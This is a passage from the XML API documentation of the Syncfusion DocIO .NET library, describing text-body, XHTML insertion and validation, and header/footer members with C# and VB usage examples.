            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ITextBody.IsValidXHTML(System.String,Syncfusion.DocIO.DLS.XHTMLValidationType)">
            <summary>
            Validates the specified html string with the specified XHTML validation type.
            </summary>
            <param name="html">The html string to validate.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.XHTMLValidationType"/> member that specifies the validation type.</param>
            <returns><b>True</b> if it is valid XHTML; otherwise, <b>false</b>.</returns>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin applications.</remarks>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx");
                //Html string to be inserted
                string htmlstring = "<p><b>This text is inserted as HTML string.</b></p>";
                //Validating the Html string
                bool isValidHtml = document.LastSection.Body.IsValidXHTML(htmlstring, XHTMLValidationType.Transitional);
                //If the Html string passes validation, it is inserted to document
                if (isValidHtml)
                {
                    //Append Html string as first item of the second paragraph in the document
                    document.Sections[0].Body.InsertXHTML(htmlstring, 2, 0);
                }
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx")
                'Html string to be inserted
                Dim htmlstring As String = "<p><b>This text is inserted as HTML string.</b></p>"
                'Validating the Html string
                Dim isValidHtmlAs Boolean = document.LastSection.Body.IsValidXHTML(htmlstring, XHTMLValidationType.Transitional)
                'If the Html string passes validation, it is inserted to document
                If isValidHtmlThen
                    'Append Html string as first item of the second paragraph in the document
                    document.Sections(0).Body.InsertXHTML(htmlstring, 2, 0)
                End If
                'Save and close the document
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ITextBody.IsValidXHTML(System.String,Syncfusion.DocIO.DLS.XHTMLValidationType,System.String@)">
            <summary>
            Validates the specified html string with the specified XHTML validation type and exception message.
            </summary>
            <param name="html">The html string to validate.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.XHTMLValidationType"/> member that specifies the validation type.</param>
            <param name="exceptionMessage">The <b>string</b> that specifies the exception message.</param>
            <returns><b>True</b> if it is valid XHTML, otherwise <b>false</b>.</returns>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin applications.</remarks>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx");
                //Html string to be inserted
                string htmlstring = "<p><b>This text is inserted as HTML string.</b></p>";
                string exception = "The string is not valid";
                //Validating the Html string
                bool isValidHtml = document.LastSection.Body.IsValidXHTML(htmlstring, XHTMLValidationType.Transitional, out exception);
                //If the Html string passes validation, it is inserted to document
                if (isValidHtml)
                {
                    //Append Html string as first item of the second paragraph in the document
                    document.Sections[0].Body.InsertXHTML(htmlstring, 2, 0);
                }
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx")
                'Html string to be inserted
                Dim htmlstring As String = "<p><b>This text is inserted as HTML string.</b></p>"
                Dim exception As String = "The string is not valid"
                'Validating the Html string
                Dim isValidHtmlAs Boolean = document.LastSection.Body.IsValidXHTML(htmlstring, XHTMLValidationType.Transitional, exception)
                'If the Html string passes validation, it is inserted to document
                If isValidHtmlThen
                    'Append Html string as first item of the second paragraph in the document
                    document.Sections(0).Body.InsertXHTML(htmlstring, 2, 0)
                End If
                'Save and close the document
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ITextBody.EnsureMinimum">
            <summary>
            If the text body has no paragraphs, creates and add one paragraph to the text body.
            </summary>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create new Word document
                WordDocument document = new WordDocument();
                //Add new section
                IWSection section = document.AddSection();
                WTextBody textbody = section.Body;
                //Add one paragraph to the section body
                textbody.EnsureMinimum();
                textbody.LastParagraph.AppendText("Last paragraph");
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create new Word document
                Dim document As New WordDocument()
                'Add new section
                Dim section As IWSection = document.AddSection()
                Dim textbody As WTextBody = section.Body
                'Add one paragraph to the section body
                textbody.EnsureMinimum()
                textbody.LastParagraph.AppendText("Last paragraph")
                'Save and close the document	
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ITextBody.Tables">
            <summary>
            Gets the collection of tables in the <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/>. Read-only.
            </summary>
            <value>The collection that represents the tables in the text body.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.IWTableCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.IWTable"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ITextBody.Paragraphs">
            <summary>
            Gets the collection of paragraphs in the <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/>. Read-only.
            </summary>
            <value>The collection that represents the paragraphs in the text body.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.IWParagraphCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.IWParagraph"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ITextBody.FormFields">
            <summary>
            Gets the collection of form fields in the <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/>. Read-only.
            </summary>
            <value>The collection that represents the form fields in the text body.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.FormFieldCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WFormField"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ITextBody.LastParagraph">
            <summary>
            Gets the last paragraph in the section. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/> object.</value>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template Word document
                WordDocument document = new WordDocument("Template.docx");
                //Get the textbody of first section
                WTextBody textbody = document.Sections[0].Body;
                //Get the last paragraph
                IWParagraph paragraph = textbody.LastParagraph;
                //Set horizontal alignment
                paragraph.ParagraphFormat.HorizontalAlignment = HorizontalAlignment.Right;
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template Word document
                Dim document As New WordDocument("Template.docx")
                'Get the textbody of first section
                Dim textbody As WTextBody = document.Sections(0).Body
                'Get the last paragraph
                Dim paragraph As IWParagraph = textbody.LastParagraph
                'Set horizontal alignment
                paragraph.ParagraphFormat.HorizontalAlignment = HorizontalAlignment.Right
                'Save and close the document	
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ITextBody.ChildEntities">
            <summary>
            Gets the child elements of the <see cref="!:WTextbody"/>.
            </summary>
            <value>The collection of the child elements.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WTextBody.m_bodyItems">
            <summary>
            The section paragraphs
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/> class.
            </summary>
            <param name="doc">The document.</param>
            <param name="owner">The owner.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.#ctor(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/> class.
            </summary>
            <param name="sec">The sec.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.AddParagraph">
            <summary>
            Adds a new paragraph at the end of section.
            </summary>
            <returns>The reference to the newly added <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/> object.</returns>
            <example>The following example illustrates how to add a paragraph to the text body.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create new Word document
                WordDocument document = new WordDocument();
                //Add new section
                IWSection section = document.AddSection();
                WTextBody textbody = section.Body;
                //Add a paragraph to the text body
                WParagraph paragraph = textbody.AddParagraph() as WParagraph;
                //Add text
                paragraph.AppendText("A new paragraph is added");
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create new Word document
                Dim document As New WordDocument()
                'Add new section
                Dim section As IWSection = document.AddSection()
                Dim textbody As WTextBody = section.Body
                'Add a paragraph to the text body
                Dim paragraph As WParagraph = TryCast(textbody.AddParagraph(), WParagraph)
                'Add text
                paragraph.AppendText("A new paragraph is added")
                'Save and close the document	
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.AddTable">
            <summary>
            Adds a new table at the end of the section.
            </summary>
            <returns>The reference to the newly added <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> object.</returns>
            <example>The following example illustrates how to add a table to the text body.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create new Word document
                WordDocument document = new WordDocument();
                //Add new section
                IWSection section = document.AddSection();
                WTextBody textbody = section.Body;
                //Add a table to the text body
                IWTable table = textbody.AddTable();
                table.ResetCells(2, 2);
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create new Word document
                Dim document As New WordDocument()
                'Add new section
                Dim section As IWSection = document.AddSection()
                Dim textbody As WTextBody = section.Body
                'Add a table to the text body
                Dim table As IWTable = textbody.AddTable()
                table.ResetCells(2, 2)
                'Save and close the document	
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.AddStructureDocumentTag">
            <summary>
            Add Structure document tag block
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.AddAlternateChunk">
            <summary>
            Add Altername Chunk
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.InsertXHTML(System.String)">
            <summary>
            Inserts the specified html string at end of the text body.
            </summary>
            <param name="html">The html string to be added to the text body.</param>
            <remarks>This method is not supported in Silverlight, Windows Phone, Universal, Universal Windows Platform and Xamarin platforms.</remarks>
            <example>The following example illustrates how to insert a html string to the text body.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx");
                //Html string to be inserted
                string htmlstring = "<p><b>This text is inserted as HTML string.</b></p>";
                //Append Html string as first item of the second paragraph in the document
                document.Sections[0].Body.InsertXHTML(htmlstring);
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx")
                'Html string to be inserted
                Dim htmlstring As String = "<p><b>This text is inserted as HTML string.</b></p>"
                'Append Html string as first item of the second paragraph in the document
                document.Sections(0).Body.InsertXHTML(htmlstring)
                'Save and close the document
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.InsertXHTML(System.String,System.Int32)">
            <summary>
            Inserts the specified html string at the specified paragraph index.
            </summary>
            <param name="html">The html string to be added to the text body.</param>
            <param name="paragraphIndex">The zero-based index of the paragraph to insert the html string.</param>
            <remarks>This method is not supported in Silverlight, Windows Phone, Universal, Universal Windows Platform and Xamarin platforms.</remarks>
            <example>The following example illustrates how to insert a html string at the specified paragraph in the text body.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx");
                //Html string to be inserted
                string htmlstring = "<p><b>This text is inserted as HTML string.</b></p>";
                //Append Html string as first item of the second paragraph in the document
                document.Sections[0].Body.InsertXHTML(htmlstring, 2);
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx")
                'Html string to be inserted
                Dim htmlstring As String = "<p><b>This text is inserted as HTML string.</b></p>"
                'Append Html string as first item of the second paragraph in the document
                document.Sections(0).Body.InsertXHTML(htmlstring, 2)
                'Save and close the document
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.InsertXHTML(System.String,System.Int32,System.Int32)">
            <summary>
            Inserts the specified html string at the paragraph specified by paragraphIndex, 
            and at paragraph item index specified by paragraphItemIndex.
            </summary>The following example illustrates how to insert a html string to the paragraph at specified paragraph item index.
            <param name="html">The html string to be added to the text body.</param>
            <param name="paragraphIndex">The zero-based index of the paragraph to insert the html string.</param>
            <param name="paragraphItemIndex">The zero-based index of the paragraph item to insert the html string.</param> 
            <remarks>This method is not supported in Silverlight, Windows Phone, Universal, Universal Windows Platform and Xamarin platforms.</remarks>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx");
                //Html string to be inserted
                string htmlstring = "<p><b>This text is inserted as HTML string.</b></p>";
                //Append Html string as first item of the second paragraph in the document
                document.Sections[0].Body.InsertXHTML(htmlstring, 2, 0);
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx")
                'Html string to be inserted
                Dim htmlstring As String = "<p><b>This text is inserted as HTML string.</b></p>"
                'Append Html string as first item of the second paragraph in the document
                document.Sections(0).Body.InsertXHTML(htmlstring, 2, 0)
                'Save and close the document
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.IsValidXHTML(System.String,Syncfusion.DocIO.DLS.XHTMLValidationType)">
            <summary>
            Validates the specified html string with the specified XHTML validation type.
            </summary>
            <param name="html">The html string to validate.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.XHTMLValidationType"/> member that specifies the validation type.</param>
            <returns><b>True</b> if it is valid XHTML; otherwise, <b>false</b>.</returns>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx");
                //Html string to be inserted
                string htmlstring = "<p><b>This text is inserted as HTML string.</b></p>";
                //Validating the Html string
                bool isValidHtml = document.LastSection.Body.IsValidXHTML(htmlstring, XHTMLValidationType.Transitional);
                //If the Html string passes validation, it is inserted to document
                if (isValidHtml)
                {
                    //Append Html string as first item of the second paragraph in the document
                    document.Sections[0].Body.InsertXHTML(htmlstring, 2, 0);
                }
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx")
                'Html string to be inserted
                Dim htmlstring As String = "<p><b>This text is inserted as HTML string.</b></p>"
                'Validating the Html string
                Dim isValidHtmlAs Boolean = document.LastSection.Body.IsValidXHTML(htmlstring, XHTMLValidationType.Transitional)
                'If the Html string passes validation, it is inserted to document
                If isValidHtmlThen
                    'Append Html string as first item of the second paragraph in the document
                    document.Sections(0).Body.InsertXHTML(htmlstring, 2, 0)
                End If
                'Save and close the document
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.IsValidXHTML(System.String,Syncfusion.DocIO.DLS.XHTMLValidationType,System.String@)">
            <summary>
            Validates the specified html string with the specified XHTML validation type and exception message.
            </summary>
            <param name="html">The html string to validate.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.XHTMLValidationType"/> member that specifies the validation type.</param>
            <param name="exceptionMessage">The <b>string</b> that specifies the exception message.</param>
            <returns><b>True</b> if it is valid XHTML, otherwise <b>false</b>.</returns>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx");
                //Html string to be inserted
                string htmlstring = "<p><b>This text is inserted as HTML string.</b></p>";
                string exception = "The string is not valid";
                //Validating the Html string
                bool isValidHtml = document.LastSection.Body.IsValidXHTML(htmlstring, XHTMLValidationType.Transitional, out exception);
                //If the Html string passes validation, it is inserted to document
                if (isValidHtml)
                {
                    //Append Html string as first item of the second paragraph in the document
                    document.Sections[0].Body.InsertXHTML(htmlstring, 2, 0);
                }
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx")
                'Html string to be inserted
                Dim htmlstring As String = "<p><b>This text is inserted as HTML string.</b></p>"
                Dim exception As String = "The string is not valid"
                'Validating the Html string
                Dim isValidHtmlAs Boolean = document.LastSection.Body.IsValidXHTML(htmlstring, XHTMLValidationType.Transitional, exception)
                'If the Html string passes validation, it is inserted to document
                If isValidHtmlThen
                    'Append Html string as first item of the second paragraph in the document
                    document.Sections(0).Body.InsertXHTML(htmlstring, 2, 0)
                End If
                'Save and close the document
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.EnsureMinimum">
            <summary>
            If the text body has no paragraphs, creates and add one paragraph to the text body.
            </summary>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create new Word document
                WordDocument document = new WordDocument();
                //Add new section
                IWSection section = document.AddSection();
                WTextBody textbody = section.Body;
                //Add one paragraph to the section body
                textbody.EnsureMinimum();
                textbody.LastParagraph.AppendText("Last paragraph");
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create new Word document
                Dim document As New WordDocument()
                'Add new section
                Dim section As IWSection = document.AddSection()
                Dim textbody As WTextBody = section.Body
                'Add one paragraph to the section body
                textbody.EnsureMinimum()
                textbody.LastParagraph.AppendText("Last paragraph")
                'Save and close the document	
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.Find(System.Text.RegularExpressions.Regex)">
            <summary>
            Finds the specified pattern.
            </summary>
            <param name="pattern">The pattern.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.FindAll(System.Text.RegularExpressions.Regex)">
            <summary>
            Finds the specified pattern.
            </summary>
            <param name="pattern">The pattern.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.Replace(System.Text.RegularExpressions.Regex,System.String)">
            <summary>
            Replaces the specified pattern.
            </summary>
            <param name="pattern">The pattern.</param>
            <param name="replace">The replace.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextSelection,System.Boolean)">
            <summary>
            Replaces the specified pattern.
            </summary>
            <param name="pattern">The pattern.</param>
            <param name="textSelection">The text selection.</param>
            <param name="saveFormatting">if it specifies the save source formatting, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextBodyPart,System.Boolean)">
            <summary>
            Replaces the specified pattern.
            </summary>
            <param name="pattern">The pattern.</param>
            <param name="textPart">The text part.</param>
            <param name="saveFormatting">if it specifies save source formatting, set to <c>true</c> .</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.IWordDocument,System.Boolean)">
            <summary>
            Replaces the specified pattern.
            </summary>
            <param name="pattern">The pattern.</param>
            <param name="replaceDoc">The replace doc.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.AddSelf">
            <summary>
            Adds the self.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.CloneImpl">
            <summary>
            Creates a duplicate copy of the entity.
            <exclude/>
            </summary>
            <returns>An <see cref="T:System.Object"/> that is newly created.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.GetBaseEntity(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Get the base entity
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.MakeChanges(System.Boolean)">
            <summary>
            Accepts or rejects changes tracked from the moment of last change acceptance.
            </summary>
            <param name="acceptChanges">if it is accept the changes, set to <c>true</c> </param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.RemoveChangedItem(Syncfusion.DocIO.DLS.TextBodyItem,System.Boolean,System.Int32@)">
            <summary>
            Removes the changed item.
            </summary>
            <param name="item">The item.</param>
            <param name="acceptChanges">if it accepts the changes, set to <c>true</c>.</param>
            <param name="itemIndex">Index of the item.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.HasTrackedChanges">
            <summary>
            Determines whether text body has tracked changes.
            </summary>
            <returns>
            	If has tracked changes, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.RemoveChangedFormat(Syncfusion.DocIO.DLS.TextBodyItem)">
            <summary>
            Removes the changed formatting.
            </summary>
            <param name="item">The item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.CheckMoveToNext(Syncfusion.DocIO.DLS.TextBodyItem,System.Boolean)">
            <summary>
            Checks the whether item's content has to be moved to next paragraph.
            </summary>
            <param name="item">The item.</param>
            <param name="acceptChanges">if it is accept the changes, set to <c>true</c> .</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.MoveToNextPara(Syncfusion.DocIO.DLS.TextBodyItem)">
            <summary>
            Moves item's content to the next paragraph.
            </summary>
            <param name="item">The item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>        
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBody.CreateLayoutInfo">
            <summary>
            Creates layout information.
            <exclude/>
            </summary>        
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBody.EntityType">
            <summary>
            Gets the type of the entity. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBody.Paragraphs">
            <summary>
            Gets the collection of paragraphs in the <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/>. Read-only.
            </summary>
            <value>The collection that represents the paragraphs in the text body.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.IWParagraphCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.IWParagraph"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBody.Tables">
            <summary>
            Gets the collection of tables in the <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/>. Read-only.
            </summary>
            <value>The collection that represents the tables in the text body.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.IWTableCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.IWTable"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBody.FormFields">
            <summary>
            Gets the collection of form fields in the <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/>. Read-only.
            </summary>
            <value>The collection that represents the form fields in the text body.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.FormFieldCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WFormField"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBody.AlternateChunkCollection">
            <summary>
            Alternate chunk collection from the current section
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBody.LastParagraph">
            <summary>
            Gets the last paragraph in the section. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/> object.</value>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template Word document
                WordDocument document = new WordDocument("Template.docx");
                //Get the textbody of first section
                WTextBody textbody = document.Sections[0].Body;
                //Get the last paragraph
                IWParagraph paragraph = textbody.LastParagraph;
                //Set horizontal alignment
                paragraph.ParagraphFormat.HorizontalAlignment = HorizontalAlignment.Right;
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template Word document
                Dim document As New WordDocument("Template.docx")
                'Get the textbody of first section
                Dim textbody As WTextBody = document.Sections(0).Body
                'Get the last paragraph
                Dim paragraph As IWParagraph = textbody.LastParagraph
                'Set horizontal alignment
                paragraph.ParagraphFormat.HorizontalAlignment = HorizontalAlignment.Right
                'Save and close the document	
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBody.IsFormFieldsCreated">
            <summary>
            Gets a value indicating whether [form fields created].
            </summary>
            <value>if the form fields created, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBody.Items">
            <summary>
            Gets the body items.
            </summary>
            <value>The body items.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBody.ChildEntities">
            <summary>
            Gets the child elements of the <see cref="!:WTextbody"/>.
            </summary>
            <value>The collection of the child elements.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBody.WidgetCollection">
            <summary>
            Gets the entity collection. Read-only.
            <exclude/>
            </summary>   
            <value>The collection of entities.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HeaderFooter.CheckWriteWatermark">
            <summary>
            Checks the m_writeWatermark variable.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HeaderFooter.#ctor(Syncfusion.DocIO.DLS.WSection,Syncfusion.DocIO.DLS.HeaderFooterType)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.HeaderFooter"/> class.
            </summary>
            <param name="sec">The <see cref="T:Syncfusion.DocIO.DLS.WSection"/> in which the current header or footer is present.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.HeaderFooterType"/> member that specifies the type of header or footer.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HeaderFooter.GetLinkToPrevious">
            <summary>
            Gets the link to previous.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HeaderFooter.UpdateLinkToPrevious(System.Boolean)">
            <summary>
            
            </summary>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HeaderFooter.FindSourceSection">
            <summary>
            Finds the source header/footer.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HeaderFooter.CheckShapes(Syncfusion.DocIO.DLS.HeaderFooter)">
            <summary>
            Checks the shapes in header/footer.
            </summary>
            <param name="hf">The hf.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HeaderFooter.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HeaderFooter.Type">
            <summary>
            Gets or sets the type of current header or footer.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.HeaderFooterType"/> member that specifies the type of header or footer.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HeaderFooter.WriteWatermark">
            <summary>
            Gets or sets a value indicating whether need write watermark.
            </summary>
            <value><c>true</c> if write watermark; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HeaderFooter.LinkToPrevious">
            <summary>
            Gets or sets a value indicating whether the current header or footer is linked to the header or footer in the previous section.
            </summary>
            <value><b>True</b> if the current header or footer is linked to the header or footer in the previous section, otherwise <b>false</b>.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WordDocument">
            <summary>
